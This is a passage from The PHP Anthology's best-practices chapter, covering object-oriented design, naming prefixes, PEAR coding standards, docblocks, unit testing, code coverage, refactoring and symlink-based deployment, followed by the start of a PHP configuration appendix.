different programming practices you should consider.
  • 466. 442 The PHP Anthology Using OOP If you haven’t done so yet, make sure you read “What is OOP?” in Chapter 1. Object oriented programming (OOP) is often derided by performance experts as being very costly to an application’s performance.6 The counter-argument is that CPU cycles and memory are cheap, while developers are not. OOP provides incredible benefits to developers: object oriented code is very easily reused and extended, it’s typically easier to test because of the testing frameworks now available in PHP, it can reduce the number of naming collisions drastically, and it can lead to shorter syntax in many cases. Consider the following example: oop.php (excerpt) class Foo { public function bar() { echo 'Do'; } } class MyFoo extends Foo { public function bar() { parent::bar(); echo ' more!'; } } Class Foo has a bar method. Class MyFoo extends class Foo and overrides the bar method. This technique allows a MyFoo object to access the functionality of its parent class by calling parent::bar, and then add its own functionality to the do method. The beauty of this approach is that the objects are now interchangeable—we can use either Foo or MyFoo, depending on the situation, and the method syntax remains exactly the same. We can instantiate an object of either class, pass it to other methods or functions, and use either object in exactly the same way without needing to know which class it encapsulates: 6 For documentation of PHP 5’s OOP feature set, visit http://www.php.net/oop5/.
  • 467. Best Practices 443 $foo = new Foo(); $foo->bar(); $foo = new MyFoo(); $foo->bar(); If we wanted to achieve the same end using procedural functions, the equivalent code might look like this: function foo_bar() { echo 'Do'; } function myfoo_bar() { foo_bar(); echo ' more'; } myfoo_bar(); The actual function call is certainly faster now that we don’t have to instantiate an object, although this benefit is moot with static methods. The downside is that we can’t simply call foo_bar() and get the new behavior—we have to call an entirely different function. If we want to be able to dynamically call a method of our choosing elsewhere in the application, we can’t hard-code the function call; instead, we need to pass a function name or PHP callback. This approach could decrease performance, and also makes debugging and testing more difficult. Let’s also consider that we may well need to implement similar functionality, but with radically different internals. As an example, we might want to create two dif­ ferent mail functions: one that sends email using the PHP mail function, and another that sends it via SMTP. I’ve witnessed situations where both functions were named mailer, which led to naming conflicts later when both files were loaded simultan­ eously. If we incorporate these functions into classes instead, using, say My_Sendmail and My_Smtp as class names, we remove the conflict:
  • 468. 444 The PHP Anthology class My_Sendmail { public function mailer($to, $subject, $body){} } class My_Smtp { public function mailer($to, $subject, $body, $host ='localhost'){} } I mentioned earlier that classes are also easier to test than procedural code. This is because the popular and well-documented unit testing frameworks, SimpleTest and PHPUnit, were designed primarily to test class methods, and even define their test suites, using classes: oop.php (excerpt) class FooTest extends PHPUnit_Framework_TestCase { /** * Foo Object * @var Foo */ protected $_foo; /** * Setup environment */ public function setUp() { $this->_foo = new Foo(); } /** * Teardown environment */ public function tearDown() { unset($this->_foo); } /** * Test the bar() method */ public function testBar() {
  • 469. Best Practices 445 ⋮ test the method… } } Writing object oriented code makes unit testing more intuitive and flexible—each test method tests a method in a class. Should you wish to investigate further, you can read about additional testing strategies on the SimpleTest and PHPUnit web sites detailed in this chapter’s introduction. Choosing a Namespace We’ve mentioned naming conflicts once already. Just because you’re using OOP now doesn’t mean you’re out of the woods; class names may still conflict. The easy way to avoid the problem is to choose a namespace, a name prefix generally based on the project name or vendor name, with which to prefix your classes.7Here are some examples of namespaces that are in use within existing projects: ■ Solar Framework: Solar_ ■ Zend Framework: Zend_ ■ Cerebral Cortex: Crtx_ Using a namespace has several benefits. Firstly, it provides a very easy way to sep­ arate your code from that of other projects. If you make your code available through a PEAR channel, for instance, having your own prefix means that your code will be grouped under a single tree within your local PEAR checkout. Secondly, as I’ve already mentioned, selecting a namespace helps to prevent naming conflicts. Uri may be the minimally most descriptive name needed to describe your class, but it could then conflict with another vendor’s Uri class; prefix it with your own namespace, and the problem is avoided: Zend_Uri, Solar_Uri, My_Uri. What should you use for your namespace? If you represent a company or a public project, try to use its name—after all, this approach is good enough for Solar and Zend. Also, try to keep the name short; you’ll appreciate not needing to type as many keystrokes every time you create a new class definition. That said, a name can be too short—you should probably use no fewer than three characters in order 7 For a good discussion of the value of namespaces, read Paul M. Jones’s blog entry “No More Loners!” at http://paul-m-jones.com/blog/?p=215.
  • 470. 446 The PHP Anthology to ensure that the name is unique and spells something recognizable. Crtx, for in­ stance, is recognizable as a truncation of “Cerebral Cortex;” anything shorter would be unrecognizable; Cortex itself starts to get lengthy as a prefix; CerebralCortex is simply too long to be usable. Choosing a Coding Standard How many times have you reformatted a coworker’s (or former employee’s) code to make it more readable? How many times has someone done the same to your code? We can consider such actions to be a net loss of coding time. Chances are that if this has happened too much in your shop, you’ve probably already decided to create a coding standard. Coding standards dictate: ■ file naming and placement ■ variable, function, and class naming conventions ■ indentation rules ■ documentation and comment guidelines … and much, much more. Rather than creating your own standard, consider adopting a public standard. The benefits of using a public standard include: It’s programmer-neutral. Instead of one programmer or group of programmers dictating their own prefer­ ences, choosing a public standard is a programmer-neutral solution. The issues have been settled. A public standard will have undergone heavy debate already. While not everyone will be able to agree that the outcome is the best one, everyone has agreed that the standards represent the best collective solutions. Use it as hiring criterion. When adopting a public standard, you can use it as a criterion of employment: “Applicant must know and be able to use XYZ Coding Standards.” It’s better for code distribution. For instance, if you’re following PEAR Coding Standards, your code will be in a format—both the physical, on-disk format, as well as the format in which the
  • 471. Best Practices 447 code is written—that can easily be packaged and installed using the PEAR in­ staller, or via a PEAR channel. So, what public standards exist? Some popular examples include: ■ PEAR, at http://pear.php.net/manual/en/standards.php ■ Zend Framework, at http://framework.zend.com/manual/en/coding-standard.html ■ eZ Components, at http://svn.ez.no/svn/ezcomponents/docs/guidelines/ With some additions of their own, these coding standards were all originally derived from the Horde project.8 Horde and PEAR coding standards are identical at this point. Zend Framework standards basically follow those of PEAR, with a few slight changes; all in all, however, Zend Framework remains compatible with PEAR. eZ Components standards are basically only used by the eZ Components project and those developers who code with it. PEAR coding standards are widely adopted, and used in other high-profile projects such as ADOdb9 and Solar.10 Overall, when it comes to a choosing a standard to adopt for your project or company, PEAR’s standards are probably the best option. The basics of PEAR coding standards are summarized as follows: ■ There is one class per file. ■ Underscores in class names map to the directory separator: for example, Net_SMTP maps to Net/SMTP.php. ■ There is One True Brace: class and function declarations have the opening brace on the following line at the same indentation level as the declaration; in other control structures, the opening brace remains on the same line as the statement. ■ Code indentation should equal four spaces per indentation level. ■ Variables, functions, and classes are named using camelCase or studlyCaps; variable and function names should begin lowercased, while classes should begin uppercased. 8 http://horde.org/ 9 http://adodb.sourceforge.net/ 10 http://solarphp.com/
  • 472. 448 The PHP Anthology ■ Private and protected properties and methods should be named with a leading underscore. ■ All classes, functions, and methods should have a docblock. All the examples in this chapter are written using PEAR coding standards. Discussion Writing distributable code is achievable once you adopt a few useful habits. Writing object oriented code may not give your projects a performance advantage, but it will help you develop code faster, as you’ll be able to easily reuse code that you or others have already written. Choosing a namespace for your code will help prevent colli­ sions with code written by other developers, and provides for the easy grouping of different code bases in the directory tree. Finally, using a coding standard lets you ensure that you’ll be able to maintain the code of your fellow programmers, and vice versa. How can I document my code for later reference by myself or others? You’ve written the next great API, and you’re all ready to release it. But nobody, including your coworkers, knows how to use it. What methods are available? What arguments do they take? What do they return? What do they actually do? Why would anyone want to use them? The topic of documentation is often skimmed over during the coding phase, but as you can see from these questions, a lack of documentation can make your code ba­ sically worthless to others. “But I don’t have time to document!” you protest. “Documentation is too hard!” This is simply not true. Documentation can be created while you code, as part of your code. Let’s see how.
  • 473. Best Practices 449 Solution phpDocumentor uses specially formatted comment blocks, called docblocks, within the code itself to generate documentation.11 Docblocks have existed for a number of years, having originally been written to support PHP 4 code, and are based on Javadoc.12 Docblocks start with an opening /** , and then follow regular C-style comment format. Multiline comment blocks should start with a *. Here’s an example: login.php (excerpt) /** * This is a sample docblock * * This is a sample docblock. Content prior to the first empty line * of the comment block is called the 'short description'; this * content here is considered the 'long description'. */ Docblocks can also contain tags that provide meta information, such as the function or method parameters and return value types, the exceptions thrown, and more. As an example, consider the following function declaration: login.php (excerpt) /** * Login a user * * Logs in a user, applying their credentials against those found in * the database. * * @param string $user Username * @param string $password User's password * @return boolean * @throws Exception on database error */ function login($user, $password) { ⋮ function body… } 11 http://phpdoc.org/ 12 http://java.sun.com/j2se/javadoc/
  • 474. 450 The PHP Anthology Running this declaration through phpDocumentor is a fairly simple exercise: $ phpdoc -f login.php -t docs This action creates a documentation tree inside the docs directory, and parses only the login.php file. The documentation generated for this function can be seen in Figure 13.1. Figure 13.1. Documentation generated with the phpDocumentor and docblocks You can link documented code using two different mechanisms. Any given docblock may contain one or more @see tags, each of which should have: a single argument; a class, function, or method name; or a documented constant, variable, object property, or object constant. An optional second argument can be used to provide information about the link. Alternatively, you can generate inline links using the {@link argument comment} syntax; the argument is the same as the one we used for @see, and the comment we provide will become the text that will be linked (if none is provided, the argument is used). Here’s an example:
  • 475. Best Practices 451 login.php (excerpt) /** * Validate a password * * Validates a password for {@link login() the login function}. * * @see login() Login function * @param string $user Username * @param string $password User's password * @return boolean */ function validatePassword($user, $password) { ⋮ function body… } What can be documented with docblocks? Well, a file can have a page-level docblock that describes the contents of the file, its author, copyright information, and so on. Classes can have a docblock describing the class, inheritance, and more. Functions and methods may have docblocks, as we saw previously. Additionally, any class member variable can have a docblock. In short, any element of the code can have a docblock. Discussion The main points to note about phpDocumentor-style code comments are: ■ Documentation resides with the code. ■ Documentation refers to the code it precedes. ■ Docblocks make your code self-documenting. Knowing these points, you really have no reason not to document your code; so as you code, document away to your heart’s content. As you’re doing so, keep a few points in mind: Use both short and long descriptions, unless they’re basically identical. In the example above, the long description provides additional information that’s not necessary for a short synopsis, but gives good information to the de­ veloper using it. Often, the parameters and return value provide plenty of in­ formation, so you don’t need to use the long description.
  • 476. 452 The PHP Anthology Use the most specific parameter and return value types you can. For instance, don’t just use a type of object or stdclass if something more specific will work, such as Solar_Db_Adapter. This type will allow you link to the appropriate class, producing even better documentation; additionally, some IDEs will use such type hinting to better provide code completion. Another point to keep in mind is that phpDocumentor is not the only tool that can parse docblocks. Another tool that can utilize the same docblocks and docblock tags as phpDocumentor to create API documentation is Doxygen.13 The benefit to using Doxygen is that it supports languages other than PHP, such as C, C++, Java, and Python, and can generate documentation accordingly. Note also that docblocks are associated with compiler tokens in PHP itself, which means that they may be retrieved through PHP’s Reflection API using the getDocComment method of any of the various Reflection classes. This ability can be useful when you want to program some form of self-discovery into your code—when you’re creating server classes, for instance. Zend Framework makes use of this capability in its various server components (Zend_XmlRpc_Server, Zend_Rest_Server, Zend_Json_Server, and Zend_Soap_Wsdl) in order to have service classes generate their own server definitions. Finally, many IDEs will use docblocks to provide code completion functionality. For example, as you type into Zend Studio and Eclipse, tool tips and drop-downs appear, displaying the possible methods of an object and the prototype for each method, as Figure 13.2 illustrates. It’s easy to select the entry you want to use from the list and save keystrokes in the process. 13 http://www.stack.nl/~dimitri/doxygen/
  • 477. Best Practices 453 Figure 13.2. IDE autocompletion based on PHP docblocks (Zend Studio) Comments can Tell Lies! Programmers always have the best of intentions when they implement a system­ atic approach to using code comments. However, as time goes by and functions are patched, enhanced, or otherwise changed, the code comments will slowly become out of date unless they’re rigorously maintained. When you read someone else’s code comments, remember that they may have written those comments for the function as it was implemented three versions ago, which may not reflect how the function actually works today. When you approach your own code, try to be as accurate as possible with your commenting, but complement your docblocks with good unit test cases—we’ll look at unit testing in “How can I ensure future changes to my code won’t break current functionality?”. A good unit test suite can serve as functional documentation, too, as it documents how the code will behave when called. So, start documenting your code today—you’ll never look back!
  • 478. 454 The PHP Anthology How can I ensure future changes to my code won’t break current functionality? Your application has been in production for a month, and all is well, but your boss has requested a new feature. You create the new functionality, roll it out, and then, within minutes, you have an angry call from your boss, who complains that some­ thing’s broken on the site. How many times has this happened to you? How can you prevent it from ever happening again? Try out one of the unit testing frameworks available to PHP. Solutions The goal of unit testing is to isolate code into distinct units and verify that each of those units satisfies all your criteria.14 When they’re run after refactoring processes or the introduction of new features, unit tests are often referred to as regression tests, and are used to check that the changes have not broken existing functionality. Typical testing frameworks have you run code and make assertions against the return values or object state. The examples that follow all reference this code: Foo.php (excerpt) /** * Foo class for PHP Anthology Best Practices chapter * * @package SitePoint * @version @release-version@ * @copyright Copyright (C) 2006-Present, SitePoint Pty Ltd. * @author Matthew Weier O'Phinney <XXX@YYYY.ZZZ> */ class Foo { /** * @var string */ public $name; /** 14 Wikipedia has an entry on unit testing, along with references to many unit-testing resources, at http://en.wikipedia.org/wiki/Unit_testing.
  • 479. Best Practices 455 * @var boolean */ public $baz = false; /** * Constructor * * @param string $name * @return void * @throws Exception with non-string $name */ public function __construct($name) { if (!is_string($name) || empty($name)) { throw new Exception('Invalid name'); } $this->name = $name; } /** * Bar returns an array * * @return array */ public function bar() { return array( 'baz', 'bal', 'boo' ); } /** * Set the {@link $baz} flag * * @param boolean $flag * @return void */ public function baz($flag) { $this->baz = ($flag) ? true : false; } } Let’s look at an example of unit testing performed on the code above:
  • 480. 456 The PHP Anthology $object = new Foo('sitepoint'); $result = $object->bar(); $this->assertTrue(is_array($result)); $this->assertContains('bar', $result); In this test, we assert that the return value of the Foo object’s bar method is an array and contains the value bar as one element. Three principal testing frameworks are used by most PHP projects: phpt (http://qa.php.net/write-test.php) The testing format used by the PHP project itself, phpt is primarily found in unit tests written for PEAR modules. PHPUnit (http://phpunit.de/) Originally a PEAR project, but now a standalone project, PHPUnit is a faithful port of Java’s JUnit.15 PHPUnit is written in PHP 5, supports E_STRICT, and is targeted largely at OOP code. SimpleTest (http://www.lastcraft.com/simple_test.php) Written in the early days of PHPUnit to address the lack of Mock Objects and web testing functionality, SimpleTest supports PHP 4, and PHP 5 when it’s not set to report E_STRICT errors. Testing Using SimpleTest or PHPUnit SimpleTest and PHPUnit test cases are written as classes, and will typically test an entire class or file of functions at a time. The basic testing strategies of these frameworks are very similar, having only minor differences. I use PHPUnit in the examples to come, partly in order to build on it in upcoming sections; however, the code could be written in SimpleTest with very few changes. In this example, we’ll test the entire Foo class: unittest.php (excerpt) /** * Test class for class Foo * 15 http://www.junit.org/
  • 481. Best Practices 457 * @uses PHPUnit_Framework_TestCase * @package Sitepoint * @subpackage UnitTests * @copyright Copyright (C) 2006-Present, SitePoint Pty Ltd. * @author Matthew Weier O'Phinney <XXX@YYYY.ZZZ> */ class FooTest extends PHPUnit_Framework_TestCase { /** * @var Foo */ protected $_foo; /** * Setup test environment * * @return void */ public function setUp() { $this->_foo = new Foo('sitepoint'); } /** * Tear down test environment * * @return void */ public function tearDown() { unset($this->_foo); } /** * Verify that the constructor properly sets the name attribute * * @return void */ public function testConstructorSetsName() { $this->assertEquals('sitepoint', $this->_foo->name); $foo = new Foo('anthology'); $this->assertEquals('anthology', $foo->name); } /** * Verify that non-string $name arguments cause the constructor * to throw an exception *
  • 482. 458 The PHP Anthology * @return void */ public function testConstructorThrowsExceptionOnBadName() { try { $foo = new Foo(''); $this->fail('Empty string should throw exception'); } catch (Exception $e) { // success } try { $foo = new Foo(array('boo', 'bar')); $this->fail('Array should throw exception'); } catch (Exception $e) { // success } try { $foo = new Foo(new Stdclass()); $this->fail('Object should throw exception'); } catch (Exception $e) { // success } try { $foo = new Foo(true); $this->fail('Boolean should throw exception'); } catch (Exception $e) { // success } } /** * Verify Foo::bar() returns an array containing the value 'bar' * * @return void
  • 483. Best Practices 459 */ public function testBar() { $bar = $this->_foo->bar(); $this->assertTrue(is_array($bar)); $this->assertContains('bar', $bar); } /** * Verify that baz() sets the $baz property * * @return void */ public function testBazSetsBazProperty() { $this->_foo->baz(true); $this->assertTrue($this->_foo->baz); $this->_foo->baz(false); $this->assertFalse($this->_foo->baz); $this->_foo->baz(1); $this->assertTrue($this->_foo->baz); $this->_foo->baz(0); $this->assertFalse($this->_foo->baz); } } In this example, the setUp method is called prior to each test case being run, and creates a Foo object. The tearDown method is called after each test case, and, in this instance, unsets the Foo object in the test suite. Any method that begins with the word test is a test method. In the examples we’ve covered, I’ve named each method to reflect either the class method being tested, or the behavior I’m testing. Thus, the name testConstructorSetsName indicates that this method will test that the constructor (__construct) sets the $name property in the object correctly. Behavioral testing such as this is particularly useful because as well as serving as contracts for the objects, the test cases themselves can serve as agile documenta­ tion—documentation automatically generated from unit tests. PHPUnit will generate agile documentation based on unit test names. For example, the documentation generated for the method called testConstructorSetsName would be “Constructor sets name.”
  • 484. 460 The PHP Anthology Testing Using phpt I skipped over phpt testing in the solution above, so let’s take a quick look at it now. phpt tests typically target a single function or method at a time, with the goal of breaking the functionality that unit provides. Test files are divided into several sections that define, at a minimum, the test name, the code to test, and the expected results. Tests are run via a script provided with the PHP distribution: run-tests.php, or the pear run-tests command. To test the Foo::bar method, we might write the following hypothetical test: --TEST-­ Foo::bar() method --FILE-­ <?php require_once 'Foo.class.php'; $foo = new Foo('simpletest'); $bar = $foo->bar(); assert(is_array($bar)); assert(in_array('bar', $bar)); ?> --EXPECT-­ You’ll note that the --EXPECT-- section here is empty. The idea is that no output is expected; the test will fail if any output—such as a warning from the assert statements—is generated. This next example sets up a testing scaffold that includes the source PHP file for the class to test, and creates the object to test. There are no formal procedures for creating test scaffolds with phpt tests, but one common convention is to create a setup.php.inc file, like so: setup.php.inc <?php require_once 'Foo.class.php'; $foo = new Foo('simpletest'); ?> That file performs the setup for us; we then require it in our test script:
  • 485. Best Practices 461 phpt.php (excerpt) --TEST-­ Foo::bar() method --FILE-­ <?php require_once 'setup.php.inc'; $bar = $foo->bar(); assert(is_array($bar)); assert(in_array('bar', $bar)); ?> --EXPECT-­ phpt tests are generally very easy to write, and offer the advantage that each test is run in its own environment so, for instance, you don’t have to worry about resetting static variables values between requests. The big disadvantages of phpt tests are the lack of a formal method for the setup and teardown of test environments, and the proliferation of files that occurs when we test classes with many methods. Discussion Additional reasons to choose a testing framework like SimpleTest or PHPUnit over phpt include: phpt lacks formal methods for assertions. Certainly, PHP’s own assert function offers the same functionality, but methods like assertTrue and assertContains have better names that indicate the type of assertion being made, and contain their own error handling functionality to ensure that the arguments provided conform to those expected. phpt lacks formal methods for setting up and tearing down the test environment. While phpt offers mechanisms for setting up the request environment, they need to be performed in each test file; this deficiency also makes it difficult to share environments between tests. phpt lacks mechanisms for sharing testing functionality between tests. In PHPUnit and SimpleTest, any method that doesn’t begin with the word test is just another method in the class, which means that you can create a more generalized method and call it from the individual test methods if several tests use similar testing strategies. The ability to easily share an environment without
  • 486. 462 The PHP Anthology needing to load additional files or classes is especially useful, for obvious reasons. If SimpleTest and PHPUnit are so similar, how can you choose one over the other? The tool you use will depend on what you’ll be testing, and the test strategies you’ll use. Each testing framework has features that the other does not (although the feature sets are converging as the years progress). For example: ■ PHPUnit includes support for code coverage reports (using XDebug; this topic is covered later in “How can I determine what remains to be tested?”). ■ SimpleTest contains support for Mock Objects (PHPUnit 3 introduces this cap­ ability). ■ SimpleTest has web testing functionality (PHPUnit 3 introduces this capability through a third-party tool, Selenium RC). ■ SimpleTest has a very active user community. I use PHPUnit extensively, mainly because it suits the projects I contribute to and the coding standards that I follow, yet I’ve met many developers who swear by SimpleTest. Choose one testing framework and learn its ins and outs—and invest­ igate the other to compare their strengths and weaknesses. Unit testing is a broad topic, and much of the information presented here is, by necessity, abbreviated. Choose a testing framework that suits your needs, and read up on the documentation for that framework as you start to write your tests. You may want to read up on unit testing in general as well. One subject that I haven’t covered here is the concept of Test Driven Development (TDD), or Test First Development. The basic tenet of TDD is to write unit tests first, then your code, and repeat the process until your project is complete. Many de­ velopers practice this strategy; it has many benefits, particularly when you refactor code or add features. For more information on TDD, see the Portland Pattern Repos­ itory wiki,16 and ExtremeProgramming.org.17 16 http://c2.com/cgi/wiki?TestDrivenDevelopment 17 http://www.extremeprogramming.org/rules/testfirst.html
  • 487. Best Practices 463 How can I determine what remains to be tested? Regardless of whether you’re using Test Driven Development or writing your tests after the fact, eventually you’ll need to know how much of your code has actually been tested. Often, even though your tests are passing, substantial portions of your code won’t have been exercised by your tests. How can you determine which code has been exercised, and which has not? Solution PHPUnit 3 provides the ability to generate code coverage reports.18 This feature requires XDebug to be installed on your machine. You can obtain XDebug via PEAR or PECL, or download the extension yourself.19 In my experience, users of *nix­ based machines will need to compile the extension themselves. To do so, use the following steps, substituting the appropriate paths, of course:20 $ cd /path/to/xdebug/sources $ /path/to/phpize $ ./configure —with-php-config=/path/to/php-config $ make $ make install Once XDebug is installed, you’ll need to enable the extension in your php.ini file. Since this extension needs to interact with the Zend Engine, you must enable it as a zend_extension: zend_extension = /full/path/to/xdebug.so The full path is absolutely necessary if the extension is to be found by the PHP en­ gine. 18 For documentation on PHPUnit’s code coverage report facilities, read the online documentation at http://www.phpunit.de/pocket_guide/3.0/en/code-coverage-analysis.html. 19 http://xdebug.org/ 20 I originally covered this process in a blog entry entitled, “Getting XDebug Working with PHPUnit For Code Coverage Reports,” at http://weierophinney.net/matthew/.
  • 488. 464 The PHP Anthology You’ll also want to disable the extension by default (there’s no need to slow down your site unless you’re actually doing some profiling or checking code coverage). This can also be done in your php.ini: xdebug.default_enable = Off While the code coverage reports run from the CLI, you may need to restart your web server after all the installation tasks and INI changes have been performed. Once XDebug is available, generating code coverage reports is as easy as throwing another switch to PHPUnit: $ phpunit --report UnitTest The --report switch expects a directory argument. When it’s run in this fashion, PHPUnit generates code coverage reports after the tests are performed, and saves them as HTML files in the directory you specify. You can then browse these reports in a web browser. For example, Figure 13.3, shows the report I generated while developing the Zend_Controller class in the Zend Framework.
  • 489. Best Practices 465 Figure 13.3. Code coverage report generated with PHPUnit and XDebug As you can see by the legend in Figure 13.3, it defines three thresholds of code coverage: ■ 0–35%: low ■ 35–70%: medium ■ 70–100%: high You can then drill down into individual files. A sample from Zend_Controller_Action is shown in Figure 13.4.
  • 490. 466 The PHP Anthology Figure 13.4. Code coverage analysis of Zend_Controller_Action showing a sampling of untested, dead, and tested code In a web browser, code coverage report output is color coded, with green marking code that has been executed, red marking code that was not executed, and orange marking “dead” code, or code that will never be executed (usually end braces). Comments, as well as function and class definitions, are never considered in code coverage. By generating these reports frequently, you can quickly determine which files need more coverage, and which code needs testing. Don’t Hold Out for 100%! True, 100% code coverage is impossible to achieve in most cases, though the report may show that it has been achieved. Often, code will be written to account for many different situations, and testing even one of those will exercise it—but there’s
  • 491. Best Practices 467 no way to test all cases. The general rule of thumb holds that test coverage of 85% or greater is excellent. I’ve reviewed some of my old code, and it’s horrible. How can I make it better? Of course, you’re one of those good developers who maintains their code rigorously, or, at the very least, you occasionally go back and review code you wrote six months or a year ago, right? And, as you learn new techniques or new approaches to prob­ lems, the code you wrote before suddenly looks like a mess of tangled, overcooked spaghetti. Solution The solution to the old-code nightmare is summed up in a single word: refactoring. Quite simply, refactoring is the act of revising a program to make it more readable, or incorporating better structure, while preserving the program’s functionality. If your code has been unit tested previously, you have a great foundation for under­ taking such a task. Create a new branch in your revision control system and start hacking away at your code. Run the existing tests regularly as you work to ensure that nothing breaks. Based on your changes, you may need to add new unit tests. Be wary of altering the existing unit tests, however, as this may lead to incompatib­ ilities. If the code in question has not been tested previously, you have a bit more work to do. Your first step should be to write unit tests for the existing code. This approach will effectively produce a contract for the new code, which must pass these tests. Additionally, in writing the tests, you’ll likely identify which areas of the code are most brittle and need to be rewritten, and uncover some bugs. Once your tests are finished, start the process of rewriting, running your test suite often.
  • 492. 468 The PHP Anthology Discussion Refactoring is a complex topic, and the solution presented here is the briefest of summaries. If you’d like to dig into a thorough discussion of the subject, I recommend a classic reference: Martin Fowler’s Refactoring.21 How can I deploy code safely? As PHP developers, we don’t release code in the typical development model: code, build, package, release. More often than not, we find ourselves making tweaks on live systems, or deploying code directly onto a live web site. Problems arise in these situations, as we introduce the possibility of site breakage. How many times has a fix or a new feature broken your web site? How many times have you needed to roll back to the previous version of a project, but had no clean way to do so? With any luck, you’re already on the way to solving many of these problems by following the examples shown previously in this chapter: ■ Use revision control software. ■ Maintain separate development and production branches of your site in your versioning system. ■ Tag your production branch prior to release. ■ Write and run unit tests for your code. ■ Make sure as much of your code as possible is being exercised by your unit tests. Solutions With those tools already in place, you have only a little way to go to reach the calm waters of safe code deployment. Using Tags and Symlinks First, set up a staging or quality-assurance server that can run off a checked-out copy of your production branch. This server can be a separate virtual host on the same machine as your production server (though that’s not recommended), or on a 21 Martin Fowler, Refactoring (Reading, MA: Addison-Wesley Professional, 1999).
  • 493. Best Practices 469 separate server entirely, preferably behind a firewall (you guessed it—this approach is recommended). Once you’ve merged your changes from the development branch or trunk into your production branch, test the site. Use unit tests as well as testing visually, using a browser—looking at your project can often reveal issues that your tests simply cannot find. Once you’re confident that the site works to your satisfaction—or even better, to your boss’s or client’s satisfaction—tag the production branch. I usually name my tags with a combination of the date and a summary of the changes being introduced, something like this: $ svn copy https://example.com/svn/project/branch/production ➥ https://example.com/svn/project/tag/2007-01-01-NewYearAnnc ➥ -m 'New Year announcements' Create an export of the tag on your production server: $ svn export ➥ https://example.com/svn/project/tag/2007-01-01-NewYearAnnc ➥ /path/to/web/2007-01-01-NewYearAnnc Then, when you’re ready to launch the changes, use a symlink. A symlink, or symbolic link, is a special directory entry in Unix-based operating systems. A symlink is not a literal directory entry, like a directory or file, but is a reference to another directory entry. In this example, we’ll assume that /path/to/web/production is where your site is installed. This will be a symlink. When it comes time to launch, make a note of the location to which the symlink points, then execute the following command: $ rm /path/to/web/production $ ln -s /path/to/web/2007-01-01-NewYearAnnc /path/to/web/production If you need to roll back to the previous version, simply point the symlink to the previous install directory.
  • 494. 470 The PHP Anthology Using a Build System Additional tasks will, more than likely, need to be undertaken during deployment. Often, user-generated content is not kept in the repository, so it will need to be transferred into the new installation directory prior to launch. If database changes have been made between versions, they will also need to be applied, or a separate database will need to be used, and content synchronized between production and the staging install. If many additional tasks, such as the ones mentioned here, are required when you deploy a new version of your web site, you may need to invest­ igate using a build system that can take care of this sort of thing for you. Examples include: GNU Make (http://www.gnu.org/software/make/) The venerable GNU Make can be used for much more than C code, and has been used in many projects successfully for performing site installation and upgrade tasks. Phing (http://phing.info/trac/) Phing Is Not GNU Make is based on Apache Ant, a Java-build system. With Phing, you use XML build files to create your build targets and tasks. Take great care to determine all the tasks that you need to perform in order to suc­ cessfully launch your site, and complete test runs on your development box regularly. The more numerous and complicated the tasks, the more likely you are to introduce errors. Adhere to the KISS principle—Keep It Simple Stupid—as much as possible, and your project deployment will be more successful. Discussion If you have a team of programmers, make sure that the deployment process is so easy that any single member of your team could deploy it on his or her own box with a minimum of effort. The symlink method may seem overly simplistic, but, as I think I’ve mentioned, the simpler you can keep the deployment process, the greater the likelihood that it’ll be a success. Ultimately, the success of any deployment will depend upon the overall development process, from planning, to coding, to final release—and everything in between. If you’re coding for extensibility, writing and running your unit tests, documenting your code, and making efficient and effective use of your
  • 495. Best Practices 471 revision control software, simple, reliable processes may be all you need when it comes to final deployment. Summary Best practices encompass a wide variety of topics, any one of which could be covered in a chapter of its own—or even a book. Many of the concerns we covered in this chapter may seem unimportant at first, especially if you’re the sole maintainer of your project, or work in a small group of like-minded developers. However, the first time you need to work on a public project, or with another team of developers—or, worse, delete your project tree or introduce an error into your project—the value of these practices will become readily apparent. Revision control will quickly become your friend, particularly when you want to keep your production code stable while continuing development on your project, be it to add new features or fix bugs. When you need to develop a feature that touches many areas of code, being able to branch to keep your changes isolated from the main development trunk becomes an invaluable advantage. Adopting a coding standard will save you many headaches as you have others review your code, and you review the code of others. If you all write in the same style, the code will be easier to read and decipher. Additionally, using sane file and class naming conventions will make it easier to find code for later revisions, and prevent the issues associated with naming collisions. Code documentation is often overlooked. Tools like phpDocumentor make the documentation of your code, while you write it, much easier. Run phpDocumentor on your code base once, having written a few code blocks, and you’ll see how quickly you can generate API documentation merely by adding a few comments to your code. I could have devoted an entire book to the subject of unit testing. I’d even go so far as to say that unit testing is arguably the single best practice from this chapter that you should learn and incorporate into your daily routine. Testing your code will help you better define your interfaces, isolate them from each other, and develop more stable, reliable code. Write tests, and, more importantly, run them often. Run code coverage reports periodically to ensure that you exercise as much of your code as possible.
  • 496. 472 The PHP Anthology Finally, an often-overlooked aspect of PHP development is the actual deployment process—the gritty details of pushing your code to the production server, and en­ suring that you can roll back if it fails. Tools like GNU Make and Phing can help automate these tasks; however, don’t underestimate the simplicity of a good repos­ itory strategy and symlinks. Often the simplest solution is best! I’ve only scratched the surface with the practices outlined in this chapter. Incorporate what you can into your daily habits, but also examine your processes constantly and ask yourself how you can perform tasks better. Refactoring your processes will ultimately be the most useful tool in your toolbox.
  • 497. Appendix A: PHP Configuration This quick reference to PHP configuration covers the most important general settings you need to be aware of, either when running applications in a live environment, or because they impact upon security or the way you write code. Configuration Mechanisms The primary mechanism for configuring PHP is the php.ini file. As the master file, it provides you with control over all configuration settings. PHP’s manual contains a guide to configuring PHP,1 and documents all the available configuration options, and where they can be set.2 Note that some configuration options can only be set in the php.ini file, while others can be set in other locations as discussed later in this section. Entries in the php.ini file generally take the following format: setting=value Be sure to read the comments provided in the file before making changes, though. The comments describe a few tricks, such as include_path using a colon (:) as a separator on Unix and a semicolon (;) on Windows, that you’ll want to be aware of. Most web hosts won’t allow you to access to your php.ini file unless you have root access to the system, which is typically not the case if you’re using a cheap, shared hosting service. The alternative is to use .htaccess files to configure PHP (assuming the web server is Apache). An .htaccess file is a plain text file that you place in a public web directory, and use to control the way Apache behaves when it comes to serving pages from that direct­ ory; for instance, you might identify in the .htaccess file the pages to which you’ll allow public access. Note that the effect of an .htaccess file is recursive—it applies to subdirectories as well. 1 